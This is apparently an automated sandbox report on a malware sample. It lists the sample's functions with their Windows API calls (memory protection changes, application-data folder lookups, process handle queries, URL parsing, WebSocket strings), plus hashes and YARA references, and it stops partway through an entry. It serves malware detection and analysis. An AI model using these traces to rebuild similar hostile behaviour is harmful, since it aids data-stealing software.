Instruction Fuzzy Hash: A8416F71A002199BDB20CFA4D994BEF77B6FB84724F14453AED25E7340D374D9418B90

Function 02454BE7 Relevance: 6.1, APIs: 4, Instructions: 115memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 02454C22
RtlAllocateHeap.NTDLL(00000000), ref: 02454C29
strlen.MSVCRT ref: 02454CB6
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 02454D37

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessProtectVirtualstrlen
String ID:
API String ID: 2355128949-0
Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction ID: e80bbeb5c3f14579028b395c775818a1bd2aeb81382c5cab58d8a12c65c6d541
Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction Fuzzy Hash: 3831E920F4833C7F86216BA56C46BDFBED4DF8E760F389053F50856188C9A86405CEEA

Function 02468027 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0246803F

Part of subcall function 0247A457: std::exception::exception.LIBCMT ref: 0247A46C
Part of subcall function 0247A457: __CxxThrowException@8.LIBCMT ref: 0247A481
Part of subcall function 0247A457: std::exception::exception.LIBCMT ref: 0247A492

std::_Xinvalid_argument.LIBCPMT ref: 0246805D
std::_Xinvalid_argument.LIBCPMT ref: 02468078
memcpy.MSVCRT(?,?,?,00000000,?,?,02467F61,00000000,?,?,00000000,?,0245941D,?), ref: 024680DB

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
String ID:
API String ID: 285807467-0
Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction ID: deca8adcd4796f1311acfdffa093ed9851bdc5a7b11ad5e26b0e5c90960f58cf
Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction Fuzzy Hash: 4321A7313006008FD325DE6CD984A3AB7E6FF94714F214E2FE5918B341D772D8498B66

Function 02468329 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0246836C
lstrlen.KERNEL32(00000000), ref: 024683B2
lstrcpy.KERNEL32(00000000,00000000), ref: 024683E1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 024683F9
lstrlen.KERNEL32(00000000), ref: 02468437
lstrcpy.KERNEL32(00000000,00000000), ref: 02468466
strtok_s.MSVCRT ref: 02468476

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID:
API String ID: 3280532728-0
Opcode ID: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
Instruction ID: 95f5c7156fc6db19ef8500aa8bfc3abd50150eec0cd544d225cb800c01f5c347
Opcode Fuzzy Hash: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
Instruction Fuzzy Hash: AC21F6719002059BCB21CF68DC4CBAABBB4EF44314F18419FEC4997282E775D98ACB92

Function 0246EF37 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0246EF7B
lstrcpy.KERNEL32(00000000,?), ref: 0246EFAA
lstrcat.KERNEL32(?,00000000), ref: 0246EFB8
lstrcat.KERNEL32(?,00638930), ref: 0246EFD3

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
Instruction ID: 1eea5d6ab7631899d2b726780a8823cd4f2c790a7e08c13e581f926dcdfead0f
Opcode Fuzzy Hash: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
Instruction Fuzzy Hash: AF3162B5A00168ABCB14EF74DC44FED77B6AF44304F10046AFE8597292DBB09E449F95

Function 0246CBA7 Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0246CBCC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246CC09
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246CC38

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s
String ID:
API String ID: 2610293679-0
Opcode ID: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
Instruction ID: c9e491bfdae720c4f86eb8764f97fcc68d5cfac504cbbc7b0682c95655d90936
Opcode Fuzzy Hash: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
Instruction Fuzzy Hash: 3C21D271E00218AFDB21EFB5DC8CAAE7BB5DB08308F04006BE845E7212D774C9469BA5

Function 02468F67 Relevance: 6.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,004353C8), ref: 02468F81
ExitProcess.KERNEL32 ref: 02468F8E
strtok_s.MSVCRT ref: 02468FA0

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID:
API String ID: 3407564107-0
Opcode ID: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
Instruction ID: b9a65ccc30cacc81eb0fbe7118aea490ccb0e0c65147fb57cae508f16de4a77b
Opcode Fuzzy Hash: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
Instruction Fuzzy Hash: D7015675900209FFDB14DFA4DC888AE77B9DB84314B10447AF90697200D7759A458BA5

Function 024735C7 Relevance: 6.0, APIs: 4, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 024735F6
RtlAllocateHeap.NTDLL(00000000), ref: 024735FD
GlobalMemoryStatusEx.KERNEL32 ref: 02473618
wsprintfA.USER32 ref: 0247363E

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID:
API String ID: 2922868504-0
Opcode ID: d388b88c30a1c9dfe14523b89c4dc98b9ef3c7d404ae617fa9327a37e18e1485
Instruction ID: 111b09820cb7c89d034b84d7b59506439f1d4307cb508d2adc24b8636f758216
Opcode Fuzzy Hash: d388b88c30a1c9dfe14523b89c4dc98b9ef3c7d404ae617fa9327a37e18e1485
Instruction Fuzzy Hash: 0E01D8B1B04254AFD714DFA8DC45BAEBBB9FB44710F00066EF916D7380D7B458018AA5

Function 02472D67 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00000000,0042A400,000000FF), ref: 02472D96
RtlAllocateHeap.NTDLL(00000000), ref: 02472D9D
GetLocalTime.KERNEL32(?), ref: 02472DA9
wsprintfA.USER32 ref: 02472DD5

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: c677d558a221d97c8446b2720690b2c9f8584bb4bc7dd71c902c6d27fd94e7e5
Instruction ID: ef460e4f05b1cc59e4f337cdf8022e820f68ef2e8f2f31b22460d179b2b2908b
Opcode Fuzzy Hash: c677d558a221d97c8446b2720690b2c9f8584bb4bc7dd71c902c6d27fd94e7e5
Instruction Fuzzy Hash: 720112B2904624ABCB149BD9DD45FBFB7BDFB4CB11F00011AF645A2290E7B85940C7B5

Function 0246CCC4 Relevance: 6.0, APIs: 4, Instructions: 43stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00435204), ref: 0246CCCA
StrCmpCA.SHLWAPI(?,00432240,?,00435204), ref: 0246CCE1
StrCmpCA.SHLWAPI(?,00435208,?,00432240,?,00435204), ref: 0246CCF8
strtok_s.MSVCRT ref: 0246CDEE

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
Instruction ID: b7e9874614d1c65ee1fba11d16cd4c7e134e86163951e3a9cf917de6b4db0227
Opcode Fuzzy Hash: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
Instruction Fuzzy Hash: 0601D171A00628A7CB119FA1DC8CBEE7BB5EF04705F10405BEC41EB301D7B896458FA6

Function 02474707 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 02474719
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02474734
CloseHandle.KERNEL32(00000000), ref: 0247473B
lstrcpy.KERNEL32(00000000,?), ref: 0247476E

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
String ID:
API String ID: 4028989146-0
Opcode ID: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
Instruction ID: e3224e96a6deaa4221f3976cd0abf920cbc3bc3ef05bd6ff7c829d59d8c2da76
Opcode Fuzzy Hash: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
Instruction Fuzzy Hash: 30F0FCB09016152FE721A7749C4DBF6B779DF05704F100195FA55D7280D7F088848BE0

Function 024775A7 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(------,02455D82), ref: 024775B2
lstrcpy.KERNEL32(00000000), ref: 024775D6
lstrcat.KERNEL32(?,------), ref: 024775E0

Strings

------, xrefs: 024775A9, 024775DE

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpylstrlen
String ID: ------
API String ID: 3050337572-882505780
Opcode ID: e9db8e840e9d600a8274a4221ea649f4724d339491b5ceafd115f726d2e0478a
Instruction ID: 401a68a81bed03b8660a54ddd488f83750446164cbca5b71798a9e16c46deb89
Opcode Fuzzy Hash: e9db8e840e9d600a8274a4221ea649f4724d339491b5ceafd115f726d2e0478a
Instruction Fuzzy Hash: FFF039749003029FDB209F35DC88927BBFAEF84749714892EA89AC7714EB74D440CF60

Function 024639D7 Relevance: 5.5, APIs: 4, Instructions: 490stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 0245169E
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 024516C0
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 024516E2
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 02451746

lstrcpy.KERNEL32(00000000,?), ref: 02463A35
lstrcpy.KERNEL32(00000000,?), ref: 02463A5E
lstrcpy.KERNEL32(00000000,?), ref: 02463A84
lstrcpy.KERNEL32(00000000,?), ref: 02463AAA

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 4f5455d5a6caf262ba9af6d4110dc9b7c3ee76a676099707a0edce832b74f1ee
Instruction ID: 33affc2140d9517f5a525140e138b39a86fac55c7526447f74134367e1768b5f
Opcode Fuzzy Hash: 4f5455d5a6caf262ba9af6d4110dc9b7c3ee76a676099707a0edce832b74f1ee
Instruction Fuzzy Hash: 1F12ED71A012418FDB18CF19C558B26BBE5AF45B18B19C1EEE809DB3A2D772DC42CF91

Function 02458AE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 02458B1A

Part of subcall function 0247A40A: std::exception::exception.LIBCMT ref: 0247A41F
Part of subcall function 0247A40A: __CxxThrowException@8.LIBCMT ref: 0247A434
Part of subcall function 0247A40A: std::exception::exception.LIBCMT ref: 0247A445

Strings

yxxx, xrefs: 02458B71
yxxx, xrefs: 02458B24

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: yxxx$yxxx
API String ID: 1823113695-1021751087
Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction ID: ef74fb9fbb6356a4de74894187bbd3ae30b66e73fbf0a99672e21a8eb658b549
Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction Fuzzy Hash: 1231ABB5E005259BCB08DF58C8906AEB7B6EF88310F148269ED159F345DB34E941CBD1

Function 02475B97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 02475BA9

Part of subcall function 0247A40A: std::exception::exception.LIBCMT ref: 0247A41F
Part of subcall function 0247A40A: __CxxThrowException@8.LIBCMT ref: 0247A434
Part of subcall function 0247A40A: std::exception::exception.LIBCMT ref: 0247A445

std::_Xinvalid_argument.LIBCPMT ref: 02475BBC

Strings

Sec-WebSocket-Version: 13, xrefs: 02475BAE

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: Sec-WebSocket-Version: 13
API String ID: 963545896-4220314181
Opcode ID: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
Instruction ID: 605b9de8902fc6a926e7ac5004d41b6741d830a4c9963e5b492f8b7ead587ad8
Opcode Fuzzy Hash: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
Instruction Fuzzy Hash: C01182713047508FD3318F2CE940B5A77E2ABC1710FA40AAFE8A1DF785D761D84187A1

Function 02454D47 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 02454DA6
InternetCrackUrlA.WININET(?,00000000), ref: 02454DAE

Strings

<, xrefs: 02454D6E

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: c02e02a012b36fed2c74b04be6013df41c29549af876b812a53909887fa019d5
Instruction ID: 606e9423992ba3aaf5c4400a6aad58a6a934e23831c4d78a3f3b806d78a324d1
Opcode Fuzzy Hash: c02e02a012b36fed2c74b04be6013df41c29549af876b812a53909887fa019d5
Instruction Fuzzy Hash: 9B012D71D00218AFDB10DFA9EC44B9EBBB9EB08360F00412AF954E7390DB7459058FD0

Function 024589A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 024589CE

Part of subcall function 0247A40A: std::exception::exception.LIBCMT ref: 0247A41F
Part of subcall function 0247A40A: __CxxThrowException@8.LIBCMT ref: 0247A434
Part of subcall function 0247A40A: std::exception::exception.LIBCMT ref: 0247A445

Strings

yxxx, xrefs: 024589B0
yxxx, xrefs: 024589D8

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: yxxx$yxxx
API String ID: 1823113695-1021751087
Opcode ID: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction ID: 3ec00460edc17e61e4125d1fd3c11536b5475cb935d4133ae58520551dcd1996
Opcode Fuzzy Hash: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction Fuzzy Hash: F5F0BE63B400325B8314A43E9D8849FA90796D439032AD767EC9AEF38AED31ECC295D0

Function 0246C3BF Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02474287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024742B4
Part of subcall function 02474287: lstrcpy.KERNEL32(00000000,?), ref: 024742E9

Part of subcall function 02477557: lstrcpy.KERNEL32(00000000), ref: 02477586
Part of subcall function 02477557: lstrcat.KERNEL32(00000000), ref: 02477592

Part of subcall function 024775A7: lstrlen.KERNEL32(------,02455D82), ref: 024775B2
Part of subcall function 024775A7: lstrcpy.KERNEL32(00000000), ref: 024775D6
Part of subcall function 024775A7: lstrcat.KERNEL32(?,------), ref: 024775E0

Part of subcall function 02477517: lstrcpy.KERNEL32(00000000), ref: 02477545

Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024740AC
Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024740D6
Part of subcall function 02474077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02451495,?,0000001A), ref: 024740E0

lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5B2
lstrcat.KERNEL32(00000000), ref: 0246C5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246C629

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
Instruction ID: ed62d2578fe148dc06db260ef24279912b448161d7f17edbe406a2d142328180
Opcode Fuzzy Hash: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
Instruction Fuzzy Hash: DE319C71E002689BCB21EFA5CC8CBAEB7B6AF44308F14446BD854AB251DB74DE41DF51

Function 0246C479 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02474287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024742B4
Part of subcall function 02474287: lstrcpy.KERNEL32(00000000,?), ref: 024742E9

Part of subcall function 02477557: lstrcpy.KERNEL32(00000000), ref: 02477586
Part of subcall function 02477557: lstrcat.KERNEL32(00000000), ref: 02477592

Part of subcall function 024775A7: lstrlen.KERNEL32(------,02455D82), ref: 024775B2
Part of subcall function 024775A7: lstrcpy.KERNEL32(00000000), ref: 024775D6
Part of subcall function 024775A7: lstrcat.KERNEL32(?,------), ref: 024775E0

Part of subcall function 02477517: lstrcpy.KERNEL32(00000000), ref: 02477545

Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024740AC
Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024740D6
Part of subcall function 02474077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02451495,?,0000001A), ref: 024740E0

lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5B2
lstrcat.KERNEL32(00000000), ref: 0246C5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246C629

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
Instruction ID: d4855be57df1527f2c2879df38e68774e341f706a1ec88d10897882c74ce019a
Opcode Fuzzy Hash: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
Instruction Fuzzy Hash: BE31B071E002699BCB20EFB5CC8CAAEB7B2AF44308F14446BD854AB611DB74DE41DF41

Function 0246C41C Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02474287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024742B4
Part of subcall function 02474287: lstrcpy.KERNEL32(00000000,?), ref: 024742E9

Part of subcall function 02477557: lstrcpy.KERNEL32(00000000), ref: 02477586
Part of subcall function 02477557: lstrcat.KERNEL32(00000000), ref: 02477592

Part of subcall function 024775A7: lstrlen.KERNEL32(------,02455D82), ref: 024775B2
Part of subcall function 024775A7: lstrcpy.KERNEL32(00000000), ref: 024775D6
Part of subcall function 024775A7: lstrcat.KERNEL32(?,------), ref: 024775E0

Part of subcall function 02477517: lstrcpy.KERNEL32(00000000), ref: 02477545

Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024740AC
Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024740D6
Part of subcall function 02474077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02451495,?,0000001A), ref: 024740E0

lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5B2
lstrcat.KERNEL32(00000000), ref: 0246C5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246C629

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
Instruction ID: 672858c6cf3fa78b6525fb22ad4fb6f2d054a243bac3a305fb861f7e417ff299
Opcode Fuzzy Hash: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
Instruction Fuzzy Hash: D5317C71E002689BCB21EFA5CC8CAAEB7B6AF44308F14446BD894AB251DB74DE41DF51

Function 0246C4D0 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02474287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024742B4
Part of subcall function 02474287: lstrcpy.KERNEL32(00000000,?), ref: 024742E9

Part of subcall function 02477557: lstrcpy.KERNEL32(00000000), ref: 02477586
Part of subcall function 02477557: lstrcat.KERNEL32(00000000), ref: 02477592

Part of subcall function 024775A7: lstrlen.KERNEL32(------,02455D82), ref: 024775B2
Part of subcall function 024775A7: lstrcpy.KERNEL32(00000000), ref: 024775D6
Part of subcall function 024775A7: lstrcat.KERNEL32(?,------), ref: 024775E0

Part of subcall function 02477517: lstrcpy.KERNEL32(00000000), ref: 02477545

Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024740AC
Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024740D6
Part of subcall function 02474077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02451495,?,0000001A), ref: 024740E0

lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5B2
lstrcat.KERNEL32(00000000), ref: 0246C5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246C629

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
Instruction ID: 2f353c6187bf77bcf1d1be6adf6bbc1efdd5455d6b849eaa095c7526d4c177ad
Opcode Fuzzy Hash: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
Instruction Fuzzy Hash: 13317A71E002689BCB20EFB5CC8CAAEB7B6AF44308F14446BD854AB612DB74DE41DF51

Function 0246C524 Relevance: 5.1, APIs: 4, Instructions: 85stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02474287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024742B4
Part of subcall function 02474287: lstrcpy.KERNEL32(00000000,?), ref: 024742E9

Part of subcall function 02477557: lstrcpy.KERNEL32(00000000), ref: 02477586
Part of subcall function 02477557: lstrcat.KERNEL32(00000000), ref: 02477592

Part of subcall function 024775A7: lstrlen.KERNEL32(------,02455D82), ref: 024775B2
Part of subcall function 024775A7: lstrcpy.KERNEL32(00000000), ref: 024775D6
Part of subcall function 024775A7: lstrcat.KERNEL32(?,------), ref: 024775E0

Part of subcall function 02477517: lstrcpy.KERNEL32(00000000), ref: 02477545

Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024740AC
Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024740D6
Part of subcall function 02474077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02451495,?,0000001A), ref: 024740E0

lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5B2
lstrcat.KERNEL32(00000000), ref: 0246C5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246C629

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: 1214f168b6e4d7af61603e865717b0356397f2a796f8462a60e47e72beb01155
Instruction ID: 2983556a523dba97d7ea84269c8ff5278e558ca7c8f28ffd9bee486d424562a0
